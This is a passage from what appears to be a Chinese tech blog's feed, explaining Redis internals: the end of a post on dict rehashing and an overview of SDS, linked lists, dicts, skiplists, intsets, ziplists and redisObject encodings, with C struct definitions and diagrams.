缩容。</li></ol><p>当满足这些条件时,将出发 Redis rehash 操作,具体步骤为:</p><ol><li>为 dict->ht[1] 分配空间,具体大小取决于目前是要扩容还是缩容,以及 ht[0].used(当前 dict 大小):<br> a. 当扩容时,新的大小为第一个大于 ht[0].used * 2 的 2^n 值;<br> b. 当缩容时,新的大小为第一个 ≥ ht[0].used 的 2^n 值。</li><li>将 ht[0].table 中所有的键值对依次 rehash 到 ht[1].table 中去,即依次为每个 dictEntry 计算 key 的 hash,并映射到新的 dictht.table 中。</li><li>当 ht[0].table 所有 dictEntry 全部迁移到 ht[1].table 里之后,释放 ht[0],并将 ht[1] 设置为 ht[0],然后再在 ht[1] 创建空的 dictht。</li></ol><h2 id="渐进式-rehash"><a href="#渐进式-rehash" class="headerlink" title="渐进式 rehash"></a>渐进式 rehash</h2><p>当 dict rehash 发生时,需要将 ht[0] 中所有 dictEntry 全部 rehash 到 ht[1] 中去。想象一下如果 dict 已经非常大时,这个操作将会非常慢,以至于影响 Redis 对外提供服务的性能。<br>所以在 Redis rehash 过程的实现中,这个过程并不是停机一次性完成的,而是会分多次进行,渐进式完成的。上面提到的 dict->rehashidx 属性,就是用来记录 rehash 流程的。</p><p>这个渐进式 rehash 大概的流程如下:</p><ol><li>为 dict->ht[1] 分配合适的空间,dict 此时同时持有 ht[0] 和 ht[1];</li><li>将 dict->rehashidx 设置为 0,代表 rehash 工作开始;</li><li>当 rehash 期间,对 dict 执行的增、删、改、查操作时,Redis 除了执行操作外,还会将 dict->ht[0].table[dict->rehashidx] 上的 dictEntry rehash 到 dict->ht[1] 中,并将 rehashidx 加一;</li><li>随着 dict rehash 不断进行,最终,dict->ht[0] 上的所有元素都被 rehash 至 dict->ht[1] 中,rehash 过程完成,将 rehashidx 置为 -1;</li><li>释放 ht[0],并将 ht[1] 设置为 ht[0],然后再在 ht[1] 创建空的 dictht。</li></ol><p>在 rehash 过程中,如果有新的元素插入,则会直接被插入到 dict->ht[1] 中去,ht[0] 将不会再插入数据。<br>而这个过程中,dict->ht[0]、ht[1] 都有部分数据,因此在 rehash 进行时,dict 的查找、删除、更新都会在两个 dictht 对象上执行。比如删除一个 key,如果这个 key 在 dict->ht[0] 中不存在,还会再在 dict->ht[1] 中查找并删除(如果存在)。</p><h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><p>回顾了一下 Redis 中 dict 的实现,当遇到 hash 冲突时的解决办法,以及 Redis 中 dict 是如何扩容和缩容的。</p>]]></content>
<summary type="html">
<p>字典(<code>dict</code>)是 Redis 实现中非常常用的数据结构,比如用来作为 set 和 hash 的底层实现之一,dict 也是 Redis 数据库中 redisDb 用来存储所有数据的基本格式。</p>
<h2 id="dict-的实现"><a hr
</summary>
<category term="Redis" scheme="https://xlzd.me/tags/Redis/"/>
<category term="data-structure" scheme="https://xlzd.me/tags/data-structure/"/>
</entry>
<entry>
<title>Redis data structure overview</title>
<link href="https://xlzd.me/2018/09/01/redis-data-structure-overview/"/>
<id>https://xlzd.me/2018/09/01/redis-data-structure-overview/</id>
<published>2018-08-31T17:52:13.000Z</published>
<updated>2019-05-14T06:33:49.582Z</updated>
<content type="html"><![CDATA[<p>所有后端开发的同学,一般都会使用到 Redis 作为数据存储或缓存。在我所知的很多互联网公司,Redis 都发挥着难以替代的作用。本文试图简单介绍下,Redis 实现中用到的一些数据结构。</p><hr><h2 id="Redis-用户侧支持的数据结构"><a href="#Redis-用户侧支持的数据结构" class="headerlink" title="Redis 用户侧支持的数据结构"></a>Redis 用户侧支持的数据结构</h2><p>完整的 Redis 命令参考可以查看 <a href="http://redisdoc.com/" target="_blank" rel="noopener">redisdoc.com</a>。</p><h3 id="string"><a href="#string" class="headerlink" title="string"></a>string</h3><p>通过 key-value pair 的方式,存储字符串、整数、浮点数等对象。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+---------+ +---------+</span><br><span class="line">| key +--->| value |</span><br><span class="line">+---------+ +---------+</span><br></pre></td></tr></table></figure></p><p>虽然叫做「 string 」,但其实更像是一个字节序列(底层存储也是一个字节数组),所以其实你可以存储任何东西到 string 中去。比如把 Python pickle 序列化后的对象、一张图片的二进制序列等任何东西存储为 string。<br>之所以说 string 是字节数组,一部分原因是其提供了直接操作 bit 的指令。<br>不完全等同于 byte array 的是,string 对象某些场景下可以直接在服务端被解释为一个 int/double 对象,然后直接进行一些数字相关的运算(加、减)。<br>string 对象是 Redis 中最基础的类型,因为后面几乎所有数据类型存储的值,都是 string 类型。</p><h3 id="hash"><a href="#hash" class="headerlink" title="hash"></a>hash</h3><p>Hash table,某些地方又被称为 <code>map</code>,概念上有点类似 Python 中的 dict 或 Golang 中的 map 等。其存储的是一系列 key-value 对。</p><h3 id="list"><a href="#list" class="headerlink" title="list"></a>list</h3><p>List 对象概念上可以理解为 Python 中的 list、Java 中的 List、Golang 中的 slice 等。之所以说概念上,是因为这几者底层实现上其实并不相同,只是都是对一组数据的集合的抽象。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+-------+ +--------+--------+--------+--------+</span><br><span class="line">| key +-->| value1 | value2 | ...... | value n|</span><br><span class="line">+-------+ +--------+--------+--------+--------+</span><br></pre></td></tr></table></figure></p><p>(逻辑上 list 是这样的,实现上下面再讲)<br>Redis 中 list 对象可以插入数据到 list 头或尾上,由于其底层实现是一个双向链表(某些场景下不是),所以插入两端都是 O(1) 的。</p><h3 id="set"><a href="#set" class="headerlink" title="set"></a>set</h3><p>Set 对象有点像是 Python 里的 set,其存储的是多个<strong>互不相同</strong>的元素。由于 set 底层使用 hash table 存储(同上,某些场景下不是),所以其大部分操作都是 O(1) 的。</p><h3 id="zset"><a href="#zset" class="headerlink" title="zset"></a>zset</h3><p>zset 是有序集合,同 set 相似的是,其内部存储的元素也是不允许重复的。不同的是,set 中存储的元素是无序的,但是 zset 存储的元素是有序的。<br>通过为 zset 中每个元素设置一个 score,zset 根据元素的 score 排序。</p><h3 id="其他(略)"><a href="#其他(略)" class="headerlink" title="其他(略)"></a>其他(略)</h3><ul><li>HyperLogLog</li><li>GEO</li></ul><hr><h2 id="实现用户侧数据结构的底层结构"><a href="#实现用户侧数据结构的底层结构" class="headerlink" title="实现用户侧数据结构的底层结构"></a>实现用户侧数据结构的底层结构</h2><p>Redis 是通过 C 语言实现的,由于 C 语言的朴素,Redis 并没有直接实现上面提到的数据结构,而是通过构件了一系列基础的数据结构,经过对象系统对下层结构的封装,来实现上层面向用户的各种结构。<br>下面,先介绍下这些底层结构。</p><h3 id="SDS"><a href="#SDS" class="headerlink" title="SDS"></a>SDS</h3><p>SDS 是「 simple dynamic string 」的缩写,是对 C 字符串的抽象(其实 C 语言没有字符串…… 2333)。<br>SDS 的定义如下( <a href="https://github.com/antirez/redis/blob/4.0/src/sds.h#L44-73" target="_blank" rel="noopener">Redis4.0 sds 定义</a>,相比 3.0 及之前版本,目前版本包含多种格式的 sdshdr 定义):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> __<span class="title">attribute__</span> ((__<span class="title">packed__</span>)) <span class="title">sdshdr64</span> {</span></span><br><span class="line"> <span class="keyword">uint64_t</span> len; <span class="comment">/* used */</span></span><br><span class="line"> <span class="keyword">uint64_t</span> alloc; <span class="comment">/* excluding the header and null terminator */</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">char</span> flags; <span class="comment">/* 3 lsb of type, 5 unused bits */</span></span><br><span class="line"> <span class="keyword">char</span> buf[];</span><br><span class="line">};</span><br></pre></td></tr></table></figure></p><p>相比 C char array,sds 有以下优点:</p><ol><li>获取字符串长度效率更优。C 字符串只是一个 ‘\0’ 结尾的 char 数组,如果需要获取字符串长度,需要遍历整个数组,遍历操作时间复杂度为 O(N)。而 sds len 属性记录了本身的长度,获取长度只需要 O(1) 复杂度。</li><li>避免数组长度溢出。类似 strcat(dst, src) 等函数,如果 dst 数组剩下的空间小于 src 的长度,则在字符串连接的时候会导致数组溢出。而在 sds 中,执行字符串拼接等修改操作时,会先通过 len、alloc 属性检查剩下的空间是否足够。当空间不足时,会先分配足够的空间。</li><li>减少内存分配次数。sds 会通过预申请内存,在连接字符串等操作时,减少对内存的申请操作。同时,如果 sds 所保存的字符串变短了,也并不会立即释放内存,而是通过 len 记录已使用,剩余空间作为 buffer 暂时保留。</li><li>二进制安全。因为 C 字符串会以 ‘\0’ 作为结束符,所以如果在 char array 中存储图片等二进制数据时,空字符会被认为是结束符。而 sds 通过 len 属性记录 buf 使用的长度,则可以避免这样的问题。</li><li>兼容部分 C 字符串函数。sds 也会在 buf 已使用的最后一位后(<code>sds->buf[sds->len]</code>)插入一个 ‘\0’,这样在 sds 存储文本数据时,可以方便地复用一些 <code>string.h</code> 已有的函数。</li></ol><h3 id="linkedlist"><a href="#linkedlist" class="headerlink" title="linkedlist"></a>linkedlist</h3><p>Redis 中 linkedlist 是一个双向链表(<a href="https://github.com/antirez/redis/blob/4.0/src/adlist.h#L36-54" target="_blank" rel="noopener">Redis4.0 linkedlist 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">listNode</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">listNode</span> *<span class="title">prev</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">listNode</span> *<span class="title">next</span>;</span></span><br><span class="line"> <span class="keyword">void</span> *value;</span><br><span class="line">} listNode;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">listIter</span> {</span></span><br><span class="line"> listNode *next;</span><br><span class="line"> <span class="keyword">int</span> direction;</span><br><span class="line">} listIter;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">list</span> {</span></span><br><span class="line"> listNode *head;</span><br><span class="line"> listNode *tail;</span><br><span class="line"> <span class="keyword">void</span> *(*dup)(<span class="keyword">void</span> *ptr);</span><br><span class="line"> <span class="keyword">void</span> (*<span class="built_in">free</span>)(<span class="keyword">void</span> *ptr);</span><br><span class="line"> <span class="keyword">int</span> (*match)(<span class="keyword">void</span> *ptr, <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> len;</span><br><span class="line">} <span class="built_in">list</span>;</span><br></pre></td></tr></table></figure></p><p>每个节点类似这样:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">+---------+ +----------+ +----------+ +----------+</span><br><span class="line">| list | | listNode | | listNode | | listNode |</span><br><span class="line">+---------+ +----------+ next +----------+ next +----------+ next</span><br><span class="line">| head +-----------> +--------> +--------> +------->NULL</span><br><span class="line">| | | value | | value | | value |</span><br><span class="line">| tail +-+ NULL<--+ <--------+ <--------+ |</span><br><span class="line">| | | prev+----------+ prev +----------+ prev +-^--------+</span><br><span class="line">| len: 3 | | |</span><br><span class="line">| | +---------------------------------------------------+</span><br><span class="line">| dup +----> ...</span><br><span class="line">| |</span><br><span class="line">| free +----> ...</span><br><span class="line">| |</span><br><span class="line">| match +----> ...</span><br><span class="line">+---------+</span><br></pre></td></tr></table></figure></p><p>list 结构通过 head、tail 记录了链表头尾指针,配合每个节点的 next、prev,方便从头或者从尾遍历等操作。<br>另外,dup/free/match 等函数指针,则是用于实现链表的多态特性:</p><ol><li>dup 函数用于复制链表节点保存的值</li><li>free 函数用于释放链表节点保存的值</li><li>match 函数用于比较节点的值与另一个输入 key 是否相同</li></ol><h3 id="dict"><a href="#dict" class="headerlink" title="dict"></a>dict</h3><p>dict 类似 Python 中的 dict 或 Golang 中的 map。<br>在 Redis 中,dict 通过一个 dict 结构实现,底层通过一个 hashtable<dictentry> 存储数据。<br>tashtable 和 dictEntry 的定义如下(<a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L69-74" target="_blank" rel="noopener">Redis4.0 dict 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> {</span></span><br><span class="line"> <span class="keyword">void</span> *key;</span><br><span class="line"> <span class="keyword">union</span> {</span><br><span class="line"> <span class="keyword">void</span> *val;</span><br><span class="line"> <span class="keyword">uint64_t</span> u64;</span><br><span class="line"> <span class="keyword">int64_t</span> s64;</span><br><span class="line"> <span class="keyword">double</span> d;</span><br><span class="line"> } v;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">dictEntry</span> *<span class="title">next</span>;</span></span><br><span class="line">} dictEntry;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictht</span> {</span></span><br><span class="line"> dictEntry **table; <span class="comment">// hash table 实际存储的位置</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> size; <span class="comment">// table 的大小</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> sizemask;</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> used; <span class="comment">// 已经使用的长度</span></span><br><span class="line">} dictht;</span><br></pre></td></tr></table></figure></dictentry></p><p>其中,dictEntry 是每个 key-value 对存储的结构,其 next 指针用于在 hash 冲突时,将多个 entry 连接一起:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">+----------+</span><br><span class="line">| dictht |</span><br><span class="line">+----------+ +----------+</span><br><span class="line">| table +--->| dictEntry|</span><br><span class="line">| | +----------+</span><br><span class="line">| size | | 0 +->NULL +---------+ +---------+</span><br><span class="line">| | +----------+ | entry | next | entry | next</span><br><span class="line">| sizemask| | 1 +------->+---------+----->+---------+----->NULL</span><br><span class="line">| | +----------+ | k1 | v1 | | k2 | v2 |</span><br><span class="line">| used | | 2 +->NULL +---------+ +---------+</span><br><span class="line">+----------+ +----------+</span><br><span class="line"> | 3 +->NULL</span><br><span class="line"> +----------+</span><br></pre></td></tr></table></figure></p><p>dict 的定义如下(<a href="https://github.com/antirez/redis/blob/4.0/src/dict.h#L76-82" target="_blank" rel="noopener">Redis4.0 dict 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dictType</span> {</span></span><br><span class="line"> <span class="comment">// 计算哈希值</span></span><br><span class="line"> <span class="keyword">uint64_t</span> (*hashFunction)(<span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 复制 key</span></span><br><span class="line"> <span class="keyword">void</span> *(*keyDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 复制 value</span></span><br><span class="line"> <span class="keyword">void</span> *(*valDup)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *obj);</span><br><span class="line"> <span class="comment">// 比较 key</span></span><br><span class="line"> <span class="keyword">int</span> (*keyCompare)(<span class="keyword">void</span> *privdata, <span class="keyword">const</span> <span class="keyword">void</span> *key1, <span class="keyword">const</span> <span class="keyword">void</span> *key2);</span><br><span class="line"> <span class="comment">// 销毁 key</span></span><br><span class="line"> <span class="keyword">void</span> (*keyDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *key);</span><br><span class="line"> <span class="comment">// 销毁 value</span></span><br><span class="line"> <span class="keyword">void</span> (*valDestructor)(<span class="keyword">void</span> *privdata, <span class="keyword">void</span> *obj);</span><br><span class="line">} dictType;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">dict</span> {</span></span><br><span class="line"> dictType *type;</span><br><span class="line"> <span class="keyword">void</span> *privdata;</span><br><span class="line"> dictht ht[<span class="number">2</span>];</span><br><span class="line"> <span class="keyword">long</span> rehashidx; <span class="comment">/* rehashing not in progress if rehashidx == -1 */</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> iterators; <span class="comment">/* number of iterators currently running */</span></span><br><span class="line">} dict;</span><br></pre></td></tr></table></figure></p><p>其中:</p><ol><li>dictType 是一个包含一组针对不同类型 entry 特定操作函数的结构体。不同类型的 entry 通过不一样的实现,来达到多台的目的。</li><li>prevdata 保存了需要传给 dictType 里的函数的特定参数(如上函数签名的 prevdata 指针)</li><li>ht 是包含两个 dictht 对象的数组,ht[0] 存储数据,ht[1] 在 rehash 的时候会用到(这里只提一下,dict rehash 过程下次单写)</li><li>rehashidx 记录 rehash 进度,这里不做过多介绍。</li></ol><p>关于 dict 结构的一些细节,下次再详细介绍。</p><h3 id="skiplist"><a href="#skiplist" class="headerlink" title="skiplist"></a>skiplist</h3><p>skiplist(跳跃表) 是一种有序的结构,通过在每个节点中维护多个指向其他节点的指针来实现快速访问节点的目的。</p><p>skiplist 的定义如下(<a href="https://github.com/antirez/redis/blob/4.0/src/server.h#L760-774" target="_blank" rel="noopener">Redis4.0 skiplist 定义</a>):</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> {</span></span><br><span class="line"> sds ele;</span><br><span class="line"> <span class="keyword">double</span> score;</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> *<span class="title">backward</span>;</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistLevel</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> *<span class="title">forward</span>;</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> span;</span><br><span class="line"> } level[];</span><br><span class="line">} zskiplistNode;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplist</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">zskiplistNode</span> *<span class="title">header</span>, *<span class="title">tail</span>;</span> <span class="comment">// 头、尾指针</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> length; <span class="comment">// 长度</span></span><br><span class="line"> <span class="keyword">int</span> level;</span><br><span class="line">} zskiplist;</span><br></pre></td></tr></table></figure><p>如上,zskiplistNode 由于保存每个节点的数据和各种指针等,zskiplist 用于保存整个 skiplist 相关信息。</p><h3 id="intset"><a href="#intset" class="headerlink" title="intset"></a>intset</h3><p>当 set 中只包含整数元素时且元素不多时,底层的数据结构便是 intset。<br>intset 的定义如下(<a href="https://github.com/antirez/redis/blob/4.0/src/intset.h#L35-39" target="_blank" rel="noopener">Redis4.0 intset 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">intset</span> {</span></span><br><span class="line"> <span class="keyword">uint32_t</span> encoding;</span><br><span class="line"> <span class="keyword">uint32_t</span> length;</span><br><span class="line"> <span class="keyword">int8_t</span> contents[];</span><br><span class="line">} intset;</span><br></pre></td></tr></table></figure></p><p>其中 contents 数组用于存储数据,intset 按照存储数字的大小有序排列在 contents 数组中。length 属性记录集合中元素的个数。<br>encoding 记录 contents 数组中存储的元素的类型:</p><ul><li><code>INTSET_ENC_INT16</code> 存储 int16 类型整数</li><li><code>INTSET_ENC_INT32</code> 存储 int32 类型整数</li><li><code>INTSET_ENC_INT64</code> 存储 int64 类型整数</li></ul><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">+----------+</span><br><span class="line">| intset |</span><br><span class="line">+----------+</span><br><span class="line">| encoding|</span><br><span class="line">| INTSET_ENC_INT16</span><br><span class="line">| |</span><br><span class="line">| length |</span><br><span class="line">| 5 |</span><br><span class="line">| | +----+---+---+---+------+</span><br><span class="line">| contents+------>+ -4 | 0 | 3 | 6 | 1024 |</span><br><span class="line">+----------+ +----+---+---+---+------+</span><br></pre></td></tr></table></figure><p>当新增元素到 intset 中时,如果新元素比现有元素类型长时,比如向 INTSET_ENC_INT16 编码的 intset 插入一个 32 位整数时,intset 需要先升级(upgrade),才能添加元素。所谓 upgrade 是将此 intset 的 enconding 更新为更长 bit 的编码格式上。当 intset 升级后不会降级,哪怕删除长 bit 元素后剩下全是短 bit 元素。</p><h3 id="ziplist"><a href="#ziplist" class="headerlink" title="ziplist"></a>ziplist</h3><p>ziplist 是 list 和 hash 的一种底层实现。当 list 元素较少且只包含整数或短字符串时,底层会通过 ziplist 存储数据。<br>ziplist 是为了节约内存而设计的一种结构,本质上就是一个约束了特殊格式的 char array,或者更正确的说法,是字节序列。展开这个字节序列,大致约束的格式是这样:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+---------+--------+-------+--------+-----+--------+-------+ </span><br><span class="line">| zlbytes | zltail | zllen | entry1 | ... | entryN | zlend | </span><br><span class="line">+---------+--------+-------+--------+-----+--------+-------+</span><br></pre></td></tr></table></figure></p><p>每部分的含义是:</p><table><thead><tr><th>field</th><th>type</th><th>sizeof</th><th>用途</th></tr></thead><tbody><tr><td> zlbytes</td><td>uint32_t</td><td>4</td><td>记录 ziplist 长度(bytes)</td></tr><tr><td> zltail</td><td>uint32_t</td><td>4</td><td>记录 ziplist 尾节点距开始的字节数,通过 zltail 可以方便地找到尾节点地址</td></tr><tr><td> zllen</td><td>uint16_t</td><td>2</td><td>记录 ziplist 节点数量:当超过 2bit 长度时,真正的节点数量需要遍历整个 ziplist 才能得到</td></tr><tr><td> entry</td><td>ziplist 存储的元素</td><td>/</td><td>ziplist 存储的元素,具体长度由具体存储的内容决定</td></tr><tr><td> zlend</td><td>uint8_t</td><td>1</td><td>值衡为 0xFF,标记 ziplist 结束</td></tr></tbody></table><p>对于每个 entry 节点,又可以展开为这样的格式:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+-----------------------+----------+---------+ </span><br><span class="line">| previous_entry_length | encoding | content |</span><br><span class="line">+-----------------------+----------+---------+</span><br></pre></td></tr></table></figure></p><p>每部分的含义是:</p><table><thead><tr><th>field</th><th>sizeof</th><th>用途</th></tr></thead><tbody><tr><td> previous_entry_length</td><td>1 or 5</td><td>前一个元素的长度(bytes),分两种情况:1. 前一个元素小于 254 bytes,则使用一个字节记录;2. 前一个元素长度大于 254 bytes,则这个字段第一字节衡为 0xFE,后面 4 位表示前一个元素长度</td></tr><tr><td> encoding</td><td>1 or 2 or 5</td><td>记录当前元素的数据类型和长度(具体本文暂略)。</td></tr><tr><td> content</td><td>/</td><td>保存节点存储的数据</td></tr></tbody></table><hr><h2 id="Redis-是如何通过底层结构构件上层数据类型的"><a href="#Redis-是如何通过底层结构构件上层数据类型的" class="headerlink" title="Redis 是如何通过底层结构构件上层数据类型的"></a>Redis 是如何通过底层结构构件上层数据类型的</h2><p>上面介绍了用户侧使用的几种常见数据类型,也介绍了 Redis 底层用于支持上层结构而实现的一些结构。下面介绍下 Redis 是如何通过下层的结构构件上层的数据类型的。</p><h3 id="redisObject-对象"><a href="#redisObject-对象" class="headerlink" title="redisObject 对象"></a>redisObject 对象</h3><p>Redis 不直接实现上层的数据类型,是为了方便在不同场景下可以替换下层合适的数据结构,同时对上层使用屏蔽下层实现细节。在不同场景下,面对性能和内存占用不同而使用不同的下层结构支持同一个上层对象。</p><p><code>redisObject</code> 对象完成了这层转换(<a href="https://github.com/antirez/redis/blob/4.0/src/server.h#L585-593" target="_blank" rel="noopener">Redis4.0 redisObject 定义</a>):<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">redisObject</span> {</span></span><br><span class="line"> <span class="keyword">unsigned</span> type:<span class="number">4</span>; <span class="comment">// 类型</span></span><br><span class="line"> <span class="keyword">unsigned</span> encoding:<span class="number">4</span>; <span class="comment">// 编码</span></span><br><span class="line"> <span class="keyword">unsigned</span> lru:LRU_BITS; <span class="comment">/* LRU time (relative to global lru_clock) or</span></span><br><span class="line"><span class="comment"> * LFU data (least significant 8 bits frequency</span></span><br><span class="line"><span class="comment"> * and most significant 16 bits access time). */</span></span><br><span class="line"> <span class="keyword">int</span> refcount;</span><br><span class="line"> <span class="keyword">void</span> *ptr; <span class="comment">// 指向底层实现数据结构的指针</span></span><br><span class="line">} robj;</span><br></pre></td></tr></table></figure></p><p>如上结构,<code>type</code> 属性记录了对象的类型,对应上层面向用户的那些数据类型(string/list/hash 等)。对应的类型,可以通过在 redis-cli 中调用 <code>TYPE key</code> 查看每个 key 对应的类型。</p><p>而 encoding 则对应着这个 redisObject 下层使用的数据类型(如上 sds/ziplist/dict 等),常见的 encoding 有:</p><table><thead><tr><th>encoding</th><th>对应的底层结构</th></tr></thead><tbody><tr><td>REDIS_ENCODING_INT</td><td>整数</td></tr><tr><td>REDIS_ENCODING_RAW</td><td>sds</td></tr><tr><td>REDIS_ENCODING_EMBSTR</td><td>embstr 编码的 sds</td></tr><tr><td>REDIS_ENCODING_HT</td><td>dict</td></tr><tr><td>REDIS_ENCODING_LINKEDLIST</td><td>linkedlist</td></tr><tr><td>REDIS_ENCODING_ZIPLIST</td><td>ziplist</td></tr><tr><td>REDIS_ENCODING_INTSET</td><td>intset</td></tr><tr><td>REDIS_ENCODING_SKIPLIST</td><td>skiplist</td></tr></tbody></table><p>对应的下层结构,可以通过在 redis-cli 中调用 <code>OBJECT ENCODING key</code> 查看每个 key 对应的底层实现的数据结构。</p><h3 id="string-–-gt-int-raw-embstr"><a href="#string-–-gt-int-raw-embstr" class="headerlink" title="string –> int/raw/embstr"></a>string –> int/raw/embstr</h3><p>string 类型在不同场景下,下层分别由 int/raw/embstr 编码方式来实现( embstr 是经过优化的用于保存短字符串的编码方式)。</p><ol><li>如果 value 是一个整数,且整数长度在 8 bytes 以内,则 string 对象的编码类型为 int,redisObject 的 ptr 指针将指向一个 long 型对象。</li><li>如果 value 是一个字符串值,且长度大于 32 字节,则 string 对象编码类型为 raw,对应 